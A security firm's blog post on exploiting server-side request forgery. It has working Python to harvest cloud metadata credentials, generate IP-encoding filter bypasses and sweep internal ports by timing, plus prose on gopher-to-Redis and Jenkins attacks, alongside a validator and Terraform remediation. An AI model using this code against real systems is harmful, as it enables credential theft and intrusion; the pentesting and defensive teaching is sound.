BIPI

SSRF Exploitation Playbook: Cloud Metadata, Internal Networks, and Filter Bypasses

Cloud Security

From IMDSv1 raids to IPv6 loopback tricks and DNS rebinding, the SSRF techniques that still own cloud workloads in 2024.

By Arjun Raghavan, Security & Systems Lead, BIPI · November 16, 2024 · 12 min read

#ssrf #cloud-security #aws #pentesting #metadata

SSRF remains the highest-leverage web bug in cloud environments. One unvalidated URL parameter can pivot from a public marketing page to IAM credentials to full account takeover. The playbook below is what BIPI red teamers run on every engagement.

Finding SSRF Sinks

  • Image proxy and avatar fetch endpoints
  • PDF and HTML to image renderers (wkhtmltopdf, Puppeteer)
  • Webhook configuration and outbound integrations
  • URL preview features in chat and CMS apps
  • OAuth redirect_uri and OpenID discovery endpoints
  • XML and SVG parsers that follow external entities or hrefs

Cloud Metadata Targets

AWS IMDSv1 at the 169.254.169.254 link-local address still hands out role credentials on any EC2 instance where IMDSv2 is not enforced, which is most legacy fleets. GCP's metadata server requires the header Metadata-Flavor: Google, and Azure's requires Metadata: true, so those two (and IMDSv2) are only reachable from a sink that lets you control request headers; a plain URL-fetch sink reaches IMDSv1 alone. Test all three providers on every engagement because hybrid deployments are common.

  1. AWS IAM security credentials path on the EC2 metadata service (lists role names, then one JSON document per role)
  2. GCP service account token endpoint via metadata.google.internal
  3. Azure identity oauth2 token endpoint, which needs both the api-version and the resource query parameters
  4. Alibaba metadata service on the 100.100.100.200 address
  5. Kubernetes API server via the kubernetes.default.svc internal DNS name, most useful once you can also read the pod's service account token
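The probe order above as a runnable routine. This is an added example, not BIPI's engagement tooling: the SSRF sink is abstracted as a `fetch(method, url, headers)` callable so the same logic drives a real sink or, as here, a constructed offline stand-in for an EC2 host that has IMDSv2 required. The role name, token and credential values are invented; the URLs and header names are the real provider ones. The point it makes is the one from the paragraph: a sink that cannot set headers gets nothing from that host, while a header-controlling sink walks the IMDSv2 token exchange and pulls the role credentials.

```python
import json
from typing import Callable, Dict, Optional, Tuple

# (method, url, headers) -> (status, body). On an engagement this wraps the SSRF sink.
Fetch = Callable[[str, str, Dict[str, str]], Tuple[int, str]]

AWS = "http://169.254.169.254"
AWS_CREDS = "/latest/meta-data/iam/security-credentials/"

# Reachable from any sink: no request header needed.
HEADERLESS_PROBES = [
    ("aws-imdsv1", "GET", AWS + AWS_CREDS, {}),
    ("alibaba", "GET",
     "http://100.100.100.200/latest/meta-data/ram/security-credentials/", {}),
]

# Header-gated: only a sink that lets you set request headers reaches these.
HEADER_PROBES = [
    ("gcp", "GET",
     "http://metadata.google.internal/computeMetadata/v1/instance/"
     "service-accounts/default/token",
     {"Metadata-Flavor": "Google"}),
    ("azure", "GET",
     "http://169.254.169.254/metadata/identity/oauth2/token"
     "?api-version=2018-02-01&resource=https://management.azure.com/",
     {"Metadata": "true"}),
]


def aws_imdsv2(fetch: Fetch) -> Optional[dict]:
    """IMDSv2 two-step: PUT for a session token, then GET with it."""
    status, token = fetch("PUT", AWS + "/latest/api/token",
                          {"X-aws-ec2-metadata-token-ttl-seconds": "21600"})
    if status != 200:
        return None
    auth = {"X-aws-ec2-metadata-token": token}
    status, roles = fetch("GET", AWS + AWS_CREDS, auth)
    if status != 200 or not roles.strip():
        return None
    role = roles.strip().splitlines()[0]          # first attached role
    status, body = fetch("GET", AWS + AWS_CREDS + role, auth)
    return json.loads(body) if status == 200 else None


def probe_metadata(fetch: Fetch, control_headers: bool) -> Dict[str, object]:
    """Run every probe the sink can reach; return provider -> leaked material."""
    hits: Dict[str, object] = {}
    for name, method, url, headers in HEADERLESS_PROBES:
        status, body = fetch(method, url, headers)
        if status == 200 and body.strip():
            hits[name] = body.strip()
    if control_headers:
        creds = aws_imdsv2(fetch)
        if creds:
            hits["aws-imdsv2"] = creds
        for name, method, url, headers in HEADER_PROBES:
            status, body = fetch(method, url, headers)
            if status == 200:
                hits[name] = body
    return hits


# Offline stand-in (constructed) for an EC2 host with IMDSv2 required.
FAKE_TOKEN = "AQAAA-constructed-session-token"
FAKE_CREDS = {"Code": "Success", "Type": "AWS-HMAC",
              "AccessKeyId": "ASIACONSTRUCTEDEXAMPLE",       # not a real key
              "SecretAccessKey": "constructed/secret/not/real",
              "Token": "constructed-sts-token"}


def fake_imdsv2_only(method: str, url: str, headers: Dict[str, str]) -> Tuple[int, str]:
    if not url.startswith(AWS):
        return 0, ""                                    # provider not present here
    if method == "PUT" and url == AWS + "/latest/api/token":
        return 200, FAKE_TOKEN
    if headers.get("X-aws-ec2-metadata-token") != FAKE_TOKEN:
        return 401, ""                                  # IMDSv1-style GET rejected
    if url == AWS + AWS_CREDS:
        return 200, "web-role\n"
    if url == AWS + AWS_CREDS + "web-role":
        return 200, json.dumps(FAKE_CREDS)
    return 404, ""


if __name__ == "__main__":
    print("header-less sink:", probe_metadata(fake_imdsv2_only, control_headers=False))
    print("header-controlling sink:", probe_metadata(fake_imdsv2_only, control_headers=True))
```

Against the constructed host the header-less run returns nothing, which is exactly the signal to report: IMDSv2 is enforced, so the finding is the SSRF itself plus whatever else the server can reach, not credentials.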

Filter Bypass Techniques

  • Decimal IP encoding that resolves to the metadata address
  • Hexadecimal IP encoding accepted by many HTTP clients
  • Octal with leading zeros to evade naive regex blocklists
  • IPv6 mapping of the IPv4 metadata address
  • DNS rebinding via services like rbndr.us or a custom NS record
  • URL parser confusion with embedded credentials and fragment markers
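The encodings in the list above, generated and then caught. This is an added example, not BIPI's tooling, and it also stands in for remediation items 3 and 4 (normalise, then range-check). The lesson it encodes: a blocklist that regex-matches the string "169.254.169.254" is beaten by every line `bypass_encodings()` produces, because curl and libc's inet_aton accept one-, two- and three-part addresses, hex and octal components and IPv4-mapped IPv6, and the only safe validator is one that parses at least as leniently as the client does and checks ranges on the normalised address. DNS rebinding is not a literal-encoding problem, so `check_url()` returns "resolve" for hostnames rather than pretending to decide them.

```python
import ipaddress
from typing import List, Optional, Union
from urllib.parse import urlsplit

Address = Union[ipaddress.IPv4Address, ipaddress.IPv6Address]
METADATA = ipaddress.IPv4Address("169.254.169.254")

BLOCKED_NETS = [ipaddress.ip_network(n) for n in (
    "169.254.0.0/16",                                    # link-local: AWS and Azure IMDS
    "127.0.0.0/8", "::1/128",                            # loopback
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16",     # RFC 1918
    "100.64.0.0/10",                                     # CGNAT, includes 100.100.100.200
    "0.0.0.0/8",                                         # "http://0/" reaches localhost on Linux
)]


def bypass_encodings(ip: str) -> List[str]:
    """Spellings of a dotted quad that inet_aton-style parsers (curl, libc) accept."""
    a, b, c, d = (int(x) for x in ip.split("."))
    n = (a << 24) | (b << 16) | (c << 8) | d
    return [
        str(n),                                          # decimal: 2852039166
        hex(n),                                          # hex: 0xa9fea9fe
        ".".join(f"0{o:o}" for o in (a, b, c, d)),       # octal: 0251.0376.0251.0376
        ".".join(f"0x{o:x}" for o in (a, b, c, d)),      # per-octet hex
        f"{a}.{b}.{(c << 8) | d}",                       # three-part: 169.254.43518
        f"{a}.{(b << 16) | (c << 8) | d}",               # two-part: 169.16689662
        f"[::ffff:{ip}]",                                # IPv4-mapped IPv6
        f"[::ffff:{n >> 16:x}:{n & 0xffff:x}]",          # same, as hex groups
    ]


def _part(s: str) -> int:
    """One inet_aton component: 0x.. is hex, a leading 0 is octal, else decimal."""
    if s[:2].lower() == "0x":
        return int(s[2:] or "0", 16)
    if len(s) > 1 and s[0] == "0":
        return int(s, 8)
    return int(s, 10)


def lenient_ipv4(host: str) -> Optional[ipaddress.IPv4Address]:
    """Mimic inet_aton: 1 to 4 parts, the last part fills all remaining bits."""
    parts = host.split(".")
    if not 1 <= len(parts) <= 4 or not all(parts):
        return None
    try:
        vals = [_part(p) for p in parts]
    except ValueError:
        return None
    *head, last = vals
    tail_bits = 8 * (5 - len(parts))
    if any(v > 255 for v in head) or last >= 1 << tail_bits:
        return None
    n = 0
    for v in head:
        n = (n << 8) | v
    return ipaddress.IPv4Address((n << tail_bits) | last)


def canonical_address(host: str) -> Optional[Address]:
    """Normalise a host literal; unwrap IPv4-mapped IPv6; None if it is a name."""
    host = host.strip("[]")
    try:
        addr = ipaddress.ip_address(host)            # strict dotted quad or IPv6
    except ValueError:
        return lenient_ipv4(host)                    # the forms strict parsing rejects
    if isinstance(addr, ipaddress.IPv6Address) and addr.ipv4_mapped:
        return addr.ipv4_mapped
    return addr


def check_url(url: str) -> str:
    """'block' or 'allow' for an IP-literal host; 'resolve' when it is a name.

    For 'resolve': resolve it yourself, run canonical_address() on the answer,
    and connect to that exact IP so a rebinding resolver cannot swap targets
    between the check and the connect.
    """
    p = urlsplit(url)
    if p.scheme not in ("http", "https") or p.username or p.password:
        return "block"                               # gopher/dict/file, embedded credentials
    addr = canonical_address(p.hostname or "")
    if addr is None:
        return "resolve"
    return "block" if any(addr in net for net in BLOCKED_NETS) else "allow"


if __name__ == "__main__":
    for enc in bypass_encodings("169.254.169.254"):
        print(f"{enc:32} -> {canonical_address(enc)}  {check_url('http://' + enc + '/')}")
```

Redirects need the same check on every hop, since a permitted external host can 302 to a blocked literal; run `check_url()` on each Location before following it.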

Internal Network Discovery

Once SSRF is confirmed, sweep the RFC 1918 ranges and common service ports. Redis on 6379, Elasticsearch on 9200, internal Jenkins on 8080, and the Kubelet on 10250 are recurring wins. When response bodies are not returned, a timing oracle still separates live hosts and open ports from dead ones.

Protocol Smuggling

The gopher and dict schemes let the server's HTTP client write arbitrary bytes to a TCP socket. A gopher payload can speak RESP to internal Redis and write an SSH key (CONFIG SET dir and dbfilename, SET, SAVE), or POST to an unauthenticated Jenkins script console for RCE. PHP's curl extension and Java's URL handlers each support a different set of schemes, so fingerprint the backend first.

SSRF is rarely just SSRF. It is the front door to whatever the server can reach, which in cloud is usually everything.

Blind SSRF Exfiltration

When responses are not returned, use Burp Collaborator or interact.sh as your callback. Time-based oracles also work: probe an internal port and measure connection latency against a known open and closed port baseline.
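The timing oracle described here and under Internal Network Discovery, as one added example (not BIPI's tooling). The SSRF sink is abstracted as a `Timer` that returns elapsed seconds for a target URL; `ssrf_timer()` shows how to wrap a real sink (the endpoint and parameter names there are hypothetical), while `FakeNetwork` is a constructed latency model so the sweep runs offline. The three baselines are learned from references whose state you already know: the app's own open port, a closed port on the same host, and an unroutable TEST-NET-1 address that times out. Each probe is then classified by nearest baseline.

```python
import random
import statistics
import time
import urllib.parse
import urllib.request
from typing import Callable, Dict, Iterable, List

Timer = Callable[[str], float]    # target url -> seconds the SSRF request took

SERVICE_PORTS = {6379: "redis", 9200: "elasticsearch", 8080: "jenkins", 10250: "kubelet"}


def ssrf_timer(endpoint: str, param: str, timeout: float = 15.0) -> Timer:
    """Wrap a real sink (hypothetical endpoint/param names) as a Timer."""
    def timer(target: str) -> float:
        url = endpoint + "?" + urllib.parse.urlencode({param: target})
        start = time.monotonic()
        try:
            urllib.request.urlopen(url, timeout=timeout).read()
        except Exception:
            pass                      # only the elapsed time matters, not the response
        return time.monotonic() - start
    return timer


def measure(timer: Timer, target: str, samples: int = 3) -> float:
    """Median of a few samples so one slow request does not misclassify a port."""
    return statistics.median(timer(target) for _ in range(samples))


def calibrate(timer: Timer, open_ref: str, closed_ref: str, down_ref: str) -> Dict[str, float]:
    """Learn the timing centroids from references whose state is already known."""
    return {"open": measure(timer, open_ref),
            "closed": measure(timer, closed_ref),
            "filtered": measure(timer, down_ref)}


def classify(elapsed: float, baseline: Dict[str, float]) -> str:
    """Nearest-centroid classification of one probe's elapsed time."""
    return min(baseline, key=lambda state: abs(elapsed - baseline[state]))


def sweep(timer: Timer, hosts: Iterable[str], ports: Iterable[int],
          baseline: Dict[str, float]) -> Dict[str, Dict[int, str]]:
    """host -> {port: state} over the given targets."""
    ports = list(ports)
    return {h: {p: classify(measure(timer, f"http://{h}:{p}/"), baseline) for p in ports}
            for h in hosts}


def live_hosts(results: Dict[str, Dict[int, str]]) -> List[str]:
    """A host is live if any port answered faster than the filtered baseline."""
    return [h for h, states in results.items()
            if any(s != "filtered" for s in states.values())]


class FakeNetwork:
    """Constructed latency model for offline use; the seconds are invented, not measured."""
    OPEN, CLOSED, DOWN = 0.60, 0.03, 5.0

    def __init__(self, open_ports: Dict[str, set], alive: set, seed: int = 7):
        self.open_ports, self.alive = open_ports, alive
        self.rng = random.Random(seed)

    def __call__(self, target: str) -> float:
        u = urllib.parse.urlsplit(target)
        host, port = u.hostname, u.port or 80
        if host not in self.alive:
            base = self.DOWN                        # connect timeout
        elif port in self.open_ports.get(host, set()):
            base = self.OPEN                        # client sends a request, waits
        else:
            base = self.CLOSED                      # immediate RST
        return base * self.rng.uniform(0.9, 1.1)    # jitter


if __name__ == "__main__":
    net = FakeNetwork(open_ports={"127.0.0.1": {80}, "10.0.0.5": {6379, 8080}},
                      alive={"127.0.0.1", "10.0.0.5", "10.0.0.6"})
    base = calibrate(net, "http://127.0.0.1:80/", "http://127.0.0.1:1/", "http://192.0.2.1:80/")
    res = sweep(net, ["10.0.0.5", "10.0.0.6", "10.0.0.7"], SERVICE_PORTS, base)
    for host in live_hosts(res):
        print(host, {SERVICE_PORTS[p]: s for p, s in res[host].items() if s == "open"})
```

On a real target the open and closed centroids can sit close together when the client's read timeout is short, so recalibrate whenever the sink's timeout behaviour changes and raise `samples` before trusting a single "open".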

Remediation

  1. Enforce IMDSv2 (http-tokens required) with a PUT-response hop limit of 1 on all EC2 instances; this stops bridged containers but not host-network ones, so pair it with an egress control
  2. Egress allowlist at the VPC level (security groups, network ACLs or a network firewall), not just in the application
  3. Resolve URLs server-side, validate the resolved IP against an allowlist, and connect to that exact IP so a rebinding DNS answer cannot swap the target between check and connect
  4. Block link-local, loopback, and RFC 1918 ranges in the HTTP client, on every redirect hop as well as the initial request
  5. Use a dedicated egress proxy with allowlisted destinations for outbound fetches
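Remediation item 1 as Terraform, weak setting beside the corrected one. This is an added example, not a BIPI template; the AMI id is a placeholder and the resource names are arbitrary. The argument names are the real `aws_instance` `metadata_options` ones.

```hcl
# Before: what many older launch templates still carry. IMDSv1 answers plain
# GETs, and a hop limit of 2 lets the token PUT response cross a bridge/NAT hop.
resource "aws_instance" "web_before" {
  ami           = "ami-0123456789abcdef0" # placeholder AMI id
  instance_type = "t3.micro"

  metadata_options {
    http_endpoint               = "enabled"
    http_tokens                 = "optional" # IMDSv1 still accepted
    http_put_response_hop_limit = 2
  }
}

# After: token required, hop limit 1. A bridged container's PUT still reaches
# the service, but the response TTL expires at the first hop back, so no token.
resource "aws_instance" "web_after" {
  ami           = "ami-0123456789abcdef0" # placeholder AMI id
  instance_type = "t3.micro"

  metadata_options {
    http_endpoint               = "enabled"
    http_tokens                 = "required"
    http_put_response_hop_limit = 1
  }
}
```

For instances already running, the same change is `aws ec2 modify-instance-metadata-options --instance-id <id> --http-tokens required --http-put-response-hop-limit 1`; verify afterwards by confirming a plain GET to the security-credentials path returns 401 from inside the instance.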
CVE-2021-22214 · GitLab SSRF to internal services, still a relevant pattern
169.254.169.254 · the address that funded a thousand bounties
1 hop · the IMDSv2 PUT-response hop limit that stops bridged containers from obtaining a token

Read more field notes, explore our services, or get in touch at info@bipi.in. Privacy Policy · Terms.